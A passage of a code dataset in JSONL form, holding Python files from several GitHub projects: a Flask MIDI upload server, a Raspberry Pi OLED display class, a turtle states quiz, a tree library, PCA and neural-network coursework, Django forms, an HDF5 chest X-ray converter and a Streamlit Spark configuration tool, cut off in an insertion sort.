'/upload')\n#app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n# This is the path to the upload directory\napp.config['UPLOAD_FOLDER'] = 'upload'\napp.config['STATIC_FOLDER'] = '/McHacks/webui/static'\n# These are the extension that we are accepting to be uploaded\napp.config['ALLOWED_EXTENSIONS'] = set(['midi', 'mid'])\n\n# For a given file, return whether it's an allowed type or not\ndef allowed_file(filename):\n return '.' 
in filename and \\\n filename.rsplit('.', 1)[1] in app.config['ALLOWED_EXTENSIONS']\n\n# This route will show a form to perform an AJAX request\n# jQuery is loaded to execute the request and update the\n# value of the operation\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n# Route that will process the file upload\n@app.route('/upload', methods=['POST'])\ndef upload():\n # Get the name of the uploaded file\n file = request.files['file']\n # Check if the file is one of the allowed types/extensions\n if file and allowed_file(file.filename):\n # Make the filename safe, remove unsupported chars\n filename = secure_filename(file.filename)\n # Move the file form the temporal folder to\n # the upload folder we setup\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n try:\n r=RandomGenerator(\"./upload/\" +str(filename))\n r.writeMidToFile()\n except:\n return render_template('error.html')\n subprocess.Popen([\"bash\", \"-c\", bash])\n return render_template('player.html')\n else:\n return render_template('error.html')\n\t\n\n\t # Redirect the user to the uploaded_file route, which\n # will basicaly show on the browser the uploaded file\n #return redirect(url_for('uploaded_file',#filename=filename))\n\n\n# This route is expecting a parameter containing the name\n# of a file. Then it will locate that file on the upload \n# directory and show it on the browser, so if the user uploads\n# an image, that image is going to be show after the upload\n@app.route('/uploads/')\ndef uploaded_file(filename):\n return send_from_directory(app.config['UPLOAD_FOLDER'],\n filename)\n \n@app.route('/static/')\ndef static_file(filename):\n return app.send_static_file(app.config['STATIC_FOLDER'])\n\n\nif __name__ == '__main__':\n app.run(\n host=\"0.0.0.0\",\n port=int(\"8083\"),\n debug=True\n )\n\n","repo_name":"tylfin/McHacks","sub_path":"webui/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"20507275308","text":"import Adafruit_SSD1306\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom PIL import ImageFont\n\nfrom bluescreen.observer import Observer\n\n\nclass OledDisplay(Observer):\n\n STEP = 16\n TEXT_OFFSET = 3\n\n AWAKE = Image.open('img/sun2.ppm').convert('1')\n ASLEEP = Image.open('img/moon.ppm').convert('1')\n\n def __init__(self, observable):\n Observer.__init__(self, observable)\n self._display = self._init_display()\n self._font = ImageFont.load_default()\n\n @staticmethod\n def _init_display():\n display = Adafruit_SSD1306.SSD1306_128_64(rst=24)\n display.begin()\n display.clear()\n display.display()\n return display\n\n def update(self, devices):\n width = self._display.width\n height = self._display.height\n image = Image.new('1', (width, height))\n\n draw = ImageDraw.Draw(image)\n\n img_x = self._display.width - 16\n for idx, device in enumerate(devices):\n y = OledDisplay.STEP * idx\n draw.text((0, y + OledDisplay.TEXT_OFFSET), '{:12s} {:2.2f}'.format(device[0], device[1]), font=self._font, fill=255)\n if device[2] is not None:\n status_image = OledDisplay.AWAKE if device[2] else OledDisplay.ASLEEP\n image.paste(status_image, (img_x, y))\n\n self._display.clear()\n self._display.image(image)\n 
self._display.display()\n\n","repo_name":"dr-mod/bluescreen","sub_path":"bluescreen/presentation/oled.py","file_name":"oled.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"11792670517","text":"import turtle\r\nfrom turtle import Turtle, Screen\r\nimport pandas\r\n\r\nscreen = Screen()\r\nscreen.title(\"U.S. States Game\")\r\nimage = \"blank_states_img.gif\"\r\nscreen.addshape(image)\r\nturtle.shape(image)\r\n\r\n\r\ndef solution_turtle(solution, x, y):\r\n papa4 = Turtle()\r\n papa4.hideturtle()\r\n papa4.penup()\r\n papa4.speed(0)\r\n papa4.setposition(x, y)\r\n papa4.write(f\"{solution}\")\r\n\r\n\r\ndef coordinates(answer):\r\n if answer in state_list:\r\n correct_a = data[data.state == answer]\r\n x_cord = int(correct_a[\"x\"])\r\n y_cord = int(correct_a[\"y\"])\r\n solution_turtle(answer, x_cord, y_cord)\r\n return x_cord, y_cord\r\n else:\r\n return False\r\n\r\n\r\ndata = pandas.read_csv(\"50_states.csv\")\r\nstate_list = list(data.state)\r\ngame_is_on = True\r\ni = 0\r\ncorrect_guesses = []\r\nwhile game_is_on:\r\n\r\n answer_state = screen.textinput(title=f\"{i}/50 correct\", prompt=\"What's another state's name?\").title()\r\n if answer_state == \"Exit\":\r\n states_to_learn = [state for state in state_list if state not in correct_guesses]\r\n df = pandas.DataFrame(states_to_learn)\r\n df.to_csv(\"states_to_learn.csv\")\r\n break\r\n if coordinates(answer_state) and i != 50:\r\n coordinates(answer_state)\r\n correct_guesses.append(answer_state)\r\n i += 1\r\n if i == 50:\r\n game_is_on = False\r\n elif not coordinates(answer_state) and i != 50:\r\n answer_state = screen.textinput(title=f\"{i}/50 correct\", prompt=\"What's another state's name?\")\r\n\r\n\r\n","repo_name":"dvisionst/states_game_proj","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"14976024675","text":"from .traversal import TreeWalkStrategy, WalkAPI\nfrom .base import TreeNode\n\n\nclass TreeAPI(object):\n \"\"\"\n Tree implementation with in-order default walk strategy.\n \"\"\"\n\n # Default walk strategy for tree\n DEFAULT_WALK_STRATEGY = TreeWalkStrategy.DEPTH_FIRST\n\n def __init__(self):\n \"\"\"\n Initializes the root node and the traversal API.\n \"\"\"\n self.traversal_api = WalkAPI(strategy=self.DEFAULT_WALK_STRATEGY)\n\n def _add_children_to_node(self, node, children_data: list):\n \"\"\"\n Creates the tree based on the data dictionary. 
Tree assumes mapping of tree\n in a dictionary, and creates nodes with Depth-First strategy using recursion.\n :param node: a tree node instance\n :type node: TreeNode\n :param children_data:\n :type children_data:\n :return:\n :rtype:\n \"\"\"\n if len(children_data) > 0:\n for child_data in children_data:\n # raise exception and if node data is not valid\n try:\n TreeNode.validate_node(child_data)\n except Exception as e:\n raise e\n\n child_node = TreeNode(name=child_data[TreeNode.NAME],\n data=child_data[TreeNode.DATA])\n\n node.add_child(child_node)\n self._add_children_to_node(child_node, child_data[TreeNode.CHILDREN])\n\n def parse(self, tree_data: dict):\n \"\"\"\n Will parse tree data into the tree and return the root node.\n :param tree_data: data used to load tree.\n :type tree_data: dict\n :return:\n :rtype:\n \"\"\"\n\n # raise exception if node data is not valid\n try:\n TreeNode.validate_node(tree_data)\n except Exception as e:\n raise e\n\n root = TreeNode(name=tree_data[TreeNode.NAME], data=tree_data[TreeNode.DATA])\n self._add_children_to_node(root, tree_data[TreeNode.CHILDREN])\n return root\n\n def walk(self, root: TreeNode, strategy: str = TreeWalkStrategy.DEPTH_FIRST, callback=None, *args, **kwargs):\n \"\"\"\n Walks the tree with a strategy. Need Callback function to process node during walk.\n :param root: root node of the tree\n :type root: TreeNode\n :param strategy: strategy to use when traversing (DFS/ BFS)\n :type strategy: str\n :param callback: The callback function executed when node is visited during traversal\n :type callback: function\n :param args: arguments for callback function\n :type args:\n :param kwargs: keyword arguments for callback function\n :type kwargs:\n :return:\n :rtype:\n \"\"\"\n\n self.traversal_api = WalkAPI(strategy=strategy)\n self.traversal_api.start_traversal(root, callback, *args, **kwargs)\n\n def as_dict(self, root: TreeNode):\n \"\"\"\n Converts tree to dict given its root node.\n\n :param root: The root node of the tree.\n :type root: TreeNode\n :return:\n :rtype:\n \"\"\"\n tree_as_dict = {TreeNode.NAME: root.name, TreeNode.DATA: root.data, TreeNode.CHILDREN: []}\n self.traversal_api.traverse_dfs_tree_to_dict(root, tree_as_dict[TreeNode.CHILDREN])\n\n return tree_as_dict\n\n def has_node(self, root_node: TreeNode, node_name: str):\n \"\"\"\n Check if the node with name exist in the tree given it's root node\n :param root_node: root node of the tree\n :type root_node: TreeNode\n :param node_name: name of the node to search\n :type node_name: str\n :return: True/ False if the node is found / not-found\n :rtype: bool\n \"\"\"\n return self.traversal_api.search(root_node, node_name)\n\n def get_height(self, root_node: TreeNode):\n \"\"\"\n Get the height of the tree given the root node.\n\n :param root_node: root node of the tree\n :type root_node: TreeNode\n :return: height of the tree\n :rtype: int\n \"\"\"\n\n return self.traversal_api.traverse_get_height(root_node)\n\n\n\n\n\n\n\n\n\n","repo_name":"nitinkatyal1314/data-structures","sub_path":"pyds/tree/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4129,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"44"} +{"seq_id":"3863919818","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[3]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# 
In[4]:\n\n\ndata = \"F:/Applied Informatics/Semester-III/Data Visualization/Laboratory Works/Homework 6 and 7/Dataset/cars.csv\"\n\n\n# In[5]:\n\n\ndata\n\n\n# In[13]:\n\n\ndataf = pd.read_csv(data, names=['mpg','cylinders','cubicinches','hp','weightlbs','time-to-60','year','brand'])\n\n\n# In[14]:\n\n\ndataf.head()\n\n\n# In[64]:\n\n\nfeatures = ['mpg','cylinders','cubicinches','hp']\ncars = dataf.loc[2:30, features].values\n\n\n# In[65]:\n\n\ncars_y = dataf.loc[2:30,['brand']].values\n\n\n# In[66]:\n\n\ncarss = StandardScaler().fit_transform(cars)\n\n\n# In[87]:\n\n\npd.DataFrame(data = cars, columns = features).head(30)\n\n\n# In[68]:\n\n\npca = PCA(n_components = 2)\n\n\n# In[69]:\n\n\nprincipalComponents = pca.fit_transform(cars)\n\n\n# In[70]:\n\n\nprincipalDf = pd.DataFrame(data = principalComponents, columns = ['PrincipalComponent_1','PrincipalComponent_2'])\n\n\n# In[85]:\n\n\nprincipalDf.head(30)\n\n\n# In[86]:\n\n\ndataf[['brand']].head(30)\n\n\n# In[74]:\n\n\nfinalDf = pd.concat([principalDf, dataf[['brand']]], axis = 1)\n\n\n# In[88]:\n\n\nfinalDf.head(30)\n\n\n# In[97]:\n\n\nfig = plt.figure(figsize = (15,15))\nax = fig.add_subplot(1,1,1) \nax.set_xlabel('Principal Component 1', fontsize = 15)\nax.set_ylabel('Principal Component 2', fontsize = 15)\nax.set_title('PCA for Car Dataset', fontsize = 20)\n\n\ntargets = ['Europe', 'US.','Japan']\ncolors = ['r', 'g', 'b']\nfor brand, color in zip(targets,colors):\n indicesToKeep = finalDf['brand'] == brand\n ax.scatter(finalDf.loc[indicesToKeep, 'PrincipalComponent_1']\n , finalDf.loc[indicesToKeep, 'PrincipalComponent_2']\n , c = color\n , s = 50)\nax.legend(targets)\nax.grid()\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"ravinthiranpartheepan1407/Data-Science-Projects","sub_path":"Data Visualization/PCA.py","file_name":"PCA.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73314191492","text":"\n# coding: utf-8\n\n# # Assignment 5\n# # Neural Network\n# submitted by
\n# roll no : 2018201051\n# \n\n# ## Question 1 : Creating Neural Network \n\n# In[ ]:\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\n# In[6]:\n\n# from google.colab import files\n# uploaded = files.upload()\n\n# from google.colab import files\n# uploaded = files.upload()\n\nget_ipython().system(u'unzip data.zip')\n\n\n# In[ ]:\n\ndef sigmoid(Z):\n temp = 1 + np.exp(-Z)\n return 1./temp\n\n\n# In[ ]:\n\ndef relu(Z):\n temp = np.where(Z >= 0 , 1 , 0)\n return Z*temp\n\n\n# In[ ]:\n\ndef softmax(Z):\n temp = np.exp(Z)\n temp1 = np.sum(temp , axis = 0)\n return np.divide(temp , temp1 , dtype = \"float\")\n\n\n# In[ ]:\n\ndef y_transform(y):\n arr = []\n for i in range(y.shape[0]):\n temp = [0,0,0,0,0,0,0,0,0,0]\n val = y.iloc[i]\n temp[val] = 1 \n arr.append(temp)\n arr = np.array(arr)\n return arr.T\n\n\n# In[ ]:\n\ndef linear_backward( dZ , A_prev , W):\n m = A_prev.shape[1]\n dW = np.dot(dZ, A_prev.T)/m\n db = np.sum(dZ, axis = 1, keepdims = True)/m\n dA_prev = np.dot(W.T, dZ)\n return dA_prev , db , dW\n\ndef relu_backward( dA , Z):\n temp = np.where(Z >= 0 , 1 ,0)\n return dA*temp\n\ndef sig_backward( dA , Z):\n temp = sigmoid(Z)*(1-sigmoid(Z))\n return dA*temp\n \ndef tanh_backward( dA , Z):\n temp = 1.0 - np.tanh(Z)**2\n return dA*temp\n\n\n# In[ ]:\n\nclass neuralNet():\n def __init__(self, dims = [] , fun = [] ,iterations = 30, learning_rate = 0.1):# dims = [input_dims, h1layer , .... , out_layer] , fun = activation function at each layer\n self.num_iters = iterations\n self.num_layers = len(dims)-1\n self.parameters = {}\n self.learning_rate = learning_rate\n self.training_error = []\n self.val_error = []\n \n for i in range(1, self.num_layers +1):\n self.parameters[\"W\" + str(i)] = np.random.randn(dims[i],dims[i-1])\n self.parameters[\"b\" + str(i)] = np.zeros((dims[i] , 1))\n self.parameters[\"activation\" + str(i)] = fun[i-1]\n \n def train_forward(self,X) :\n caches = []\n A_old = X\n for i in range(1, self.num_layers + 1) :\n\n temp = np.matmul(self.parameters[\"W\" + str(i)], A_old) \n Z = temp + self.parameters[\"b\" + str(i)]\n \n if np.isnan(np.sum(Z)) :\n print(\"Error at Layer : \" + str(i))\n print(Z)\n\n if self.parameters[\"activation\" + str(i)] == \"relu\" :\n A_new = relu(Z)\n \n elif self.parameters[\"activation\" + str(i)] == \"tanh\" :\n A_new = np.tanh(Z)\n\n\n elif self.parameters[\"activation\" + str(i)] == \"sigmoid\":\n A_new = sigmoid(Z)\n\n elif self.parameters[\"activation\" + str(i)] == \"softmax\":\n A_new = softmax(Z)\n \n cache = (A_old, Z)\n caches.append(cache)\n A_old = A_new\n return A_new , caches\n \n \n \n def train_backward(self , Al , y , caches):\n grads = {}\n L = self.num_layers\n A_prev , Z = caches[ L - 1 ]\n dZl = Al - y # for softmax layer only\n dA_prev , db , dW = linear_backward( dZl , A_prev ,self.parameters[\"W\" + str(L)])\n# grads[\"dA\" + str(L-1)] = dA_prev\n grads[\"dW\" + str(L)] = dW\n grads[\"db\" + str(L)] = db\n for i in range(L-1,0,-1) :\n A_prev , Z = caches[i-1]\n if self.parameters[\"activation\" + str(i)] == \"relu\":\n dZ = relu_backward(dA_prev , Z)\n elif self.parameters[\"activation\" + str(i)] == \"sigmoid\":\n dZ = sig_backward(dA_prev, Z)\n elif self.parameters[\"activation\" + str(i)] == \"tanh\":\n dZ = tanh_backward(dA_prev, Z)\n dA_prev, db , dW = linear_backward(dZ ,A_prev , self.parameters[\"W\" + str(i)])\n\n grads[\"dW\" + str(i)] = dW\n grads[\"db\" + str(i)] = db\n return grads \n \n \n def update_weights(self, grads):\n for l in range(self.num_layers):\n\n 
self.parameters[\"W\" + str(l+1)] += -self.learning_rate*grads[\"dW\" + str(l+1)]\n self.parameters[\"b\" + str(l+1)] += -self.learning_rate*grads[\"db\" + str(l+1)]\n\n def fit(self , X, Y ,val_X , val_Y, batch_size = 5000):\n l = X.shape[0]/batch_size\n \n val_X = val_X.astype('float')/255\n val_Y = y_transform(val_Y)\n \n for i in range(self.num_iters):\n print(\"Epoch ========== \" + str(i)+\" :=========== \")\n cost = 0\n for j in range(l):\n x_batch = X.iloc[j*batch_size : (j+1)*batch_size , :].astype('float')\n y_batch = Y.iloc[j*batch_size : (j+1)*batch_size ]\n x_batch = x_batch/255\n\n Al , caches = self.train_forward(x_batch.T)\n y_batch = y_transform(y_batch)\n cost += self.error(Al , y_batch) # y-batch should be ( nl * m )\n grads = self.train_backward(Al ,y_batch , caches)\n self.update_weights(grads)\n \n self.training_error.append(float(cost)/X.shape[0])\n \n #Calculating validation error\n al_val, _ = self.train_forward(val_X.T)\n val_e = float(self.error(al_val,val_Y))/val_X.shape[0]\n self.val_error.append(val_e)\n print(\"training error is \" + str(float(cost)/X.shape[0]))\n print(\"val error is : \" + str(val_e))\n \n def error(self, al , y ):\n n_max = np.max(al ,axis = 0 )\n result = np.where(al >=n_max , 1 , 0)\n cost = np.sum(np.sum(np.abs(result-y) , axis = 0)/2)\n return float(cost)\n \n def epoch_vs_accuracy(self):\n plt.plot( range(self.num_iters), self.training_error , 'r')\n plt.plot(range(self.num_iters) , self.val_error , 'g')\n plt.xlabel(\"numbers of Epochs\")\n plt.ylabel(\"error\")\n plt.legend([\"training error\" , \"validation error\"])\n plt.show()\n \n \n def predict(self , X):\n X = X.astype('float')/255\n# y = y_transform(y)\n al, caches = self.train_forward(X.T)\n n_max = np.max(al ,axis = 0)\n result = np.where(al >=n_max , 1 , 0)\n temp = np.array([0,1,2,3,4,5,6,7,8,9]).reshape(10,1)\n n_max2 = np.max(result*temp,axis = 0)\n return n_max2\n \n# \n\n\n# ## Loading Apparel dataset\n\n# In[ ]:\n\ndata = pd.read_csv('data.csv')\ndata.head()\ntrain_data = data.iloc[:50000,:]\nval_data = data.iloc[50000:,:]\n\n\n# In[ ]:\n\ntrain_X = train_data.iloc[: , 1:]\ntrain_Y = train_data.iloc[: , 0]\nval_X = val_data.iloc[:,1:]\nval_Y = val_data.iloc[:,0]\n\n\n# ## Some examples \n\n# ### Training a neural network with 2 hidden layers and sigmoid function \n\n# In[ ]:\n\nNN = neuralNet([784 ,300, 100 , 10] ,['sigmoid', 'sigmoid' , 'softmax'] , iterations = 50)\n\n\n# In[16]:\n\nNN.fit(train_X ,train_Y ,val_X , val_Y , 500)\n\n\n# ### Predicting on test data\n\n# In[ ]:\n\ntest_data = pd.read_csv(\"apparel-test (1).csv\")\n\n\n# In[25]:\n\ntest_result = NN.predict(test_data)\nprint(test_result)\nnp.savetxt(\"foo.csv\", test_result , fmt = \"%d\")\n\nfiles.download('foo.csv')\n\n\n# In[19]:\n\nNN.epoch_vs_accuracy()\n\n\n# ### Training with relu function \n\n# In[ ]:\n\nNN1 = neuralNet([784 ,64, 10] ,['relu' , 'softmax'] , iterations = 50, learning_rate = 0.005)\n\n\n# In[23]:\n\nNN1.fit(train_X , train_Y,val_X , val_Y , 100)\n\n\n# In[24]:\n\nNN1.epoch_vs_accuracy()\n\n\n# ### Training with Tanh function( 2 hidden layers )\n\n# In[ ]:\n\nNN2 = neuralNet([784 ,256 , 256, 10] ,['tanh' ,'tanh' , 'softmax'] , iterations = 50, learning_rate = 0.1)\n\n\n# In[27]:\n\nNN2.fit(train_X , train_Y , val_X ,val_Y , 100)\n\n\n# In[28]:\n\nNN2.epoch_vs_accuracy()\n\n\n# ### Training with Sigmoid \n\n# In[ ]:\n\nNN3 = neuralNet([784 ,1024, 10] ,['sigmoid' , 'softmax'] , iterations = 50 , learning_rate = 0.1)\n\n\n# In[30]:\n\nNN3.fit(train_X, train_Y , val_X , val_Y , 
100)\n\n\n# In[32]:\n\nNN3.epoch_vs_accuracy()\n\n\n# ## Accuracy variation with no of layers : \n\n# In[34]:\n\nlayers = [1,2,3]\nerror_rates = []\n\n# 1 hidden layer\nNN4 = neuralNet([784 ,256, 10] ,['sigmoid' , 'softmax'] , iterations = 20 , learning_rate = 0.1)\nNN4.fit(train_X,train_Y , val_X , val_Y , 500)\nerror_rates.append(NN4.val_error[-1])\n\n# 2 hidden layer\nNN5 = neuralNet([784 ,256,256, 10] ,['sigmoid', 'sigmoid' , 'softmax'] , iterations = 20 , learning_rate = 0.1)\nNN5.fit(train_X , train_Y , val_X , val_Y , 500)\nerror_rates.append(NN5.val_error[-1])\n\n#3 hidden layers\n\nNN6 = neuralNet([784 ,256,256,256, 10] ,['sigmoid','sigmoid','sigmoid','softmax'] , iterations = 20 , learning_rate = 0.1)\nNN6.fit(train_X , train_Y , val_X , val_Y , 500)\nerror_rates.append(NN6.val_error[-1])\n\n\nplt.plot(layers , error_rates , 'g')\nplt.show()\n\n\n# In[37]:\n\nNN4.epoch_vs_accuracy()\nNN5.epoch_vs_accuracy()\nNN6.epoch_vs_accuracy()\nplt.plot(layers , error_rates , 'g')\nplt.xlabel(\"No of layers\")\nplt.ylabel(\"Error\")\nplt.show()\n\n\n# ## Question 2 : \n\n# ### Requirments for the data set of house price prediction : \n\n# ```\n# 1 . only one node will be enough in the output layer since it is a regression problem .\n# 2 . Required linear activation function in the output layer(need to modifiy as softmax is used in above \n# neural network) .\n# 3 . All hidden layers should not have linear activation function since it will be unable to learn \n# nonlinearity in the data because 3 hidden layers with all linear activation will work the same way \n# as a single layer neural network. \n# 4 . cost function should also be changed.(ex : least mean square can be used. )\n# ```\n","repo_name":"agarwal29796/neural-network","sub_path":"src/2018201051.py","file_name":"2018201051.py","file_ext":"py","file_size_in_byte":9673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"73710576131","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom .models import User\n\n\nclass CreateUserForm(UserCreationForm):\n class Meta:\n model = User\n fields = (\"username\", \"email\", \"password1\", \"password2\")\n\n\nclass EditProfileForm(forms.ModelForm):\n profile = forms.ImageField(\n required=False,\n error_messages={\"invald\": (\"Image files only.\")},\n widget=forms.FileInput,\n )\n\n class Meta:\n model = User\n fields = (\"username\", \"email\", \"bio\", \"profile\")\n\n\nclass SearchForm(forms.Form):\n username = forms.CharField(\n required=False,\n widget=forms.TextInput(attrs={\"placeholder\": \"Search by username\"}),\n )\n\n class Meta:\n model = User\n fields = (\"username\",)\n","repo_name":"jee3153/instagram-clone","sub_path":"accounts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"27917939992","text":"#!/usr/bin/env python\n# make_h5.py\n#\nimport argparse\nimport h5py\nimport io\nimport numpy\nimport os\nimport torchvision.transforms\nimport tqdm\nfrom PIL import Image\n\nimport sys\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nimport datasets.padchestdataset\nPADCHEST_CORRUPTED = set(datasets.padchestdataset.CORRUPTED)\n\ndef is_image(path):\n lower = path.lower()\n if lower.startswith('.') or lower.endswith('fake.jpg'):\n return False\n if lower.endswith('.jpg') or lower.endswith('png'):\n return True\n else:\n 
return False\n\ndef find_images(parentpath):\n '''\n Find images in ``parentpath`` and all subdirectories. Return list of paths \n (strings).\n '''\n paths = []\n for triple in os.walk(parentpath, followlinks=True):\n for path in triple[-1]:\n if is_image(path):\n paths.append(os.path.join(triple[0], path))\n # remove path prefix\n for ipath, path in enumerate(paths):\n paths[ipath] = path[len(parentpath):]\n return paths\n\ndef save_png_bytes(h5handle, path, image):\n image_byte_array = io.BytesIO()\n image.save(image_byte_array, format='PNG')\n image_bytes = image_byte_array.getvalue()\n # magic\n image_raw_np = numpy.asarray(image_bytes)\n h5handle['images'].create_dataset(path, data=image_raw_np)\n\ndef convert_dataset():\n transform = torchvision.transforms.Compose([\n torchvision.transforms.Scale(224),\n torchvision.transforms.CenterCrop(224)\n ])\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", dest='imagedir')\n parser.add_argument(\"-o\", dest='outpath')\n args = parser.parse_args()\n\n h5handle = h5py.File(args.outpath, 'w', libver='latest')\n h5handle.swmr_mode = True\n\n h5handle.create_group(\"images\")\n\n # directory structure is
/\n print(\"\\n\")\n img_paths = find_images(args.imagedir)\n for ip in tqdm.tqdm(img_paths):\n if not os.path.basename(ip) in PADCHEST_CORRUPTED:\n path = os.path.join(os.path.abspath(args.imagedir), ip.strip('/')) \n image = Image.open(path)\n # downsample\n image = transform(image)\n save_png_bytes(h5handle, ip, image)\n\nif __name__ == \"__main__\":\n convert_dataset()\n","repo_name":"suinleelab/cxr_covid","sub_path":"data/make_h5.py","file_name":"make_h5.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"44"} +{"seq_id":"39725380264","text":"from turtle import onclick\nimport pandas as pd\nimport numpy as np\nfrom sklearn import tree\nimport streamlit as st\n\ndtype = {\n 'INST': int,\n 'CORE': int,\n 'RAM': int,\n 'Time-q64-v2.4': np.float64,\n 'Time-q70-v2.4': np.float64,\n 'Time-q82-v2.4': np.float64,\n 'Time-Avg': np.float64,\n 'Cost-q64-v2.4': np.float64,\n 'Cost-q70-v2.4': np.float64,\n 'Cost-q82-v2.4': np.float64,\n 'Cost-Avg': np.float64\n}\n\n# Read original CSV\ndf = pd.read_csv(\"F:\\\\Stuff\\\\Thesis\\\\Results.csv\", delimiter=';', decimal=',', dtype=dtype)\n# One hot representation for types of queries\ndf2 = pd.melt(df, id_vars=['INST', 'CORE', 'RAM'], value_vars=['Time-q64-v2.4', 'Time-q70-v2.4', 'Time-q82-v2.4', 'Time-Avg'], var_name='type', value_name='time')\ndf2 = pd.concat([df2, pd.get_dummies(df2['type'])], axis=1)\ndf2 = df2[df2.columns[~df2.columns.isin(['type'])]]\n# Values for cost per time unit\nvCPUsec = 1.461777E-5\nGBsec = 0.160513888888E-5\n# Reintroduce cost column\ndf2['cost'] = df2['time'] * (df2['INST'] * df2['CORE'] * vCPUsec + df2['RAM'] * GBsec)\n# Copy dataframe in order to iteratively change column values later\nfdf = df2.copy()\n\nst.write('Configuration')\n# Pick query or Avg\nquery = st.selectbox('Load Type', ['Balanced', 'Network Shuffle Heavy', 'CPU Heavy', 'I/O Heavy'])\nif query == 'Balanced':\n query = 'Avg'\nelif query == 'Network Shuffle Heavy':\n query = 'q64-v2.4'\nelif query == 'CPU Heavy':\n query = 'q70-v2.4'\nelse:\n query = 'q82-v2.4'\n\n# Scale = 10 for default dataset otherwise change to 100, 1000 and so on to get linear approximation\nscale = st.select_slider('Dataset Size', options=[10, 100, 1000, 10000], format_func=str)\n\nfdf['cost'] = df2['cost']*scale/10\nfdf['time'] = df2['time']*scale/10\n\n# Split to X and y\nX = fdf.loc[fdf[f'Time-{query}'] == 1]\ny = fdf.loc[fdf[f'Time-{query}'] == 1][fdf.columns[:3]]\n\n# Declare three decision trees\nregr = tree.DecisionTreeRegressor()\nregr2 = tree.DecisionTreeRegressor()\nregr3 = tree.DecisionTreeRegressor()\n\n# Fit the trees to the data\ntime_to_settings = regr.fit(X['time'].array.reshape(-1,1), y)\nmoney_to_settings = regr2.fit(X['cost'].array.reshape(-1,1), y)\nsettings_to_time = regr3.fit(y, X['time'].array.reshape(-1,1))\n\n########################################################\ndef find_config():\n global rinput, x\n if rinput == 'Runtime (seconds)':\n i, c, r = time_to_settings.predict([[x]])[0]\n else:\n i, c, r = money_to_settings.predict([[x]])[0]\n return(f'Instances: {int(i)} Cores: {int(c)} RAM: {int(r)}')\n\nst.write('Find Configuration')\n\nrinput = st.radio('Input', ['Runtime (seconds)', 'Cost'])\n\nx = st.number_input('Constraint Value')\nst.write('Valid Configuration')\nst.write(find_config())\n########################################################\ndef find_time_cost():\n global w, cor, ra\n time = settings_to_time.predict([[w, cor, ra]])[0]\n return(f'Approximated 
Time: {time:.2f}s, Calculated Cost: {time*(w*cor*vCPUsec+ra*GBsec)}')\nst.write('')\nst.write('Calculate Time & Cost from Configuration')\n\nw = st.select_slider('Workers', [1, 2, 3, 4])\ncor = st.select_slider('Cores (per worker)', [1, 2, 3])\nra = st.select_slider('RAM (per worker)', [1, 2, 3])\n\nst.button('Calculate', on_click=find_time_cost)\nst.write(find_time_cost())","repo_name":"AriSpyrou/DSS-for-Spark-on-Kubeflow","sub_path":"python/decision_tree_bonanza.py","file_name":"decision_tree_bonanza.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7980577280","text":"import tkinter as tk\nimport os\nfrom PIL import Image\n\nroot = tk.Tk()\nscrollbar = tk.Scrollbar(root)\nscrollbar.pack( side = tk.RIGHT, fill=tk.Y )\nmylist = tk.Listbox(root, font = \"verdana 15\", yscrollcommand = scrollbar.set, height= 5, width = 10 )\n\npathToImages = ['/home/jinho/Dropbox/Projects/ICC/assets/image1.jpg',\n'/home/jinho/Dropbox/Projects/ICC/assets/image1.jpg','/home/jinho/Dropbox/Projects/ICC/assets/image1.jpg',\n'/home/jinho/Dropbox/Projects/ICC/assets/image1.jpg']\n\ndef buttonHandler(self):\n bi = Image.open(pathToImages[int(mylist.curselection()[0])])\n bi.show()\n\na = mylist.insert(tk.END,str('Biscuit'))\nb = mylist.insert(tk.END,str('Chocolate'))\nc = mylist.insert(tk.END,str('Sandwich'))\nd = mylist.insert(tk.END,str('Cake'))\n\nmylist.bind('<>', buttonHandler)\n\n\nmylist.pack( )\nscrollbar.config( command = mylist.yview )\ntk.mainloop()\n","repo_name":"jinhopark8345/ICC","sub_path":"icc/gui/temp_list_with_image.py","file_name":"temp_list_with_image.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"74673007814","text":"# 1. Create an unsorted array\nmyNums = [20, 83, 99, 28, 37, 45, 74, 16, 9, 35]\n# 2. Create a function named insertion_sort\ndef insertion_sort():\n# 3. Create a for loop that will iterate the array with respect to its length\n for i in range(1, len(myNums)):\n element = myNums[i] #i = 1\n j = i-1 # 0\n# 4. Create a while loop that will compare a consecutive pair in the array\n while j >= 0 and element < myNums[j]: 